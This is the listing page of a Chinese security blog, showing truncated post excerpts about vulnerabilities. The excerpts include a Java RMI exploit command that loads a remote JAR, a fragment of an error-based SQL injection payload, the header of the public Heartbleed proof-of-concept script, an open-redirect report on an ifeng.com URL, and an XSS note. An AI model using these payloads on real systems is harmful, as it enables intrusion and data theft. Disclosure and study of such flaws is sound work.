英雄' Blog

测试方法如下： 上传ErrorBaseExec.jar到自己服务器WEB目录，然后执行以下命令: java -jar RMIexploit.jar 123.123.123.123 1099 http://1.1.1.1.1/ErrorBase...

周末去了一趟广州，回来的时候到机场太早，无法打印登机牌，再加上白云机场电信VIP休息厅应郭嘉要求关闭了，无聊之间对登机牌打印机，免费电话打起了注意，没...

利用方式如下： action=grouppermission&gids[99]='&gids[100][0]=) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(he...

利用脚本: #!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) # The author disclaim...

不多说，上图，他人请勿恶意尝试!

简要描述： 凤凰网某URL存在跳转漏洞，可以跳转到未授权的第三方网站，可能被攻击者利用钓鱼。 详细说明： http://bc.ifeng.com/c?d=ifeng&i=z,0,0&u= 该跳转...

此跨站存在于TRS WAS4.0上

敏感信息已抹掉

敏感信息已抹掉

前几天网络不给力，果断秒掉。